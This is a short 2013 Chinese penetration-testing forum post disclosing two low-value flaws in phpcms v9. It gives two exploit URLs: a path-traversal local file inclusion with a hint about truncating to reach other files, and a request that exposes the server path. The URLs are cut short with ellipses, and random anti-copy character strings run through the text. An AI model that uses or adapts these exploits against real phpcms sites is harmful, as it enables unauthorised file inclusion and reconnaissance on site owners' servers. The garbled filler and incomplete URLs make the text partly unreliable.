中国网络渗透测试联盟
标题:
phpcms v9两个鸡肋漏洞
[打印本页]
作者:
admin
时间:
2013-4-4 17:28
标题:
phpcms v9两个鸡肋漏洞
我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。
- H5 p+ B4 N! M- L
8 Z. |+ e8 H4 L% F `& Y
Exp:
http://www.php0day.com/api.php?o ... efile=../../../fuck
6 n% k) R. J" N1 R: ^
9 A" ?, T0 e/ c4 @$ K$ h! V% Z8 c- s
#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。
3 q' w; P( N! D: z
. H9 m5 g9 n2 P/ i4 Y/ j+ o6 t
Exp:
http://www.php0day.com/phpcms/mo ... l.php?author=b4dboy
0 z7 A" c Z4 P' X* b/ w
& k2 h& g3 P( v4 }
#暴路径
8 g( g2 i" }6 e8 _2 M; r
5 X( Q; |3 j, |3 Q* e Y. C4 N( r
注:请遵守国家相关法律,请勿非法入侵,产生任何后果自己负责。
. o* b* o! z B
, y }, h3 _9 P( k3 d i) c7 K- K
0 v; k$ h& _1 f! u
% g* g, o+ A* a# ~
+1
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2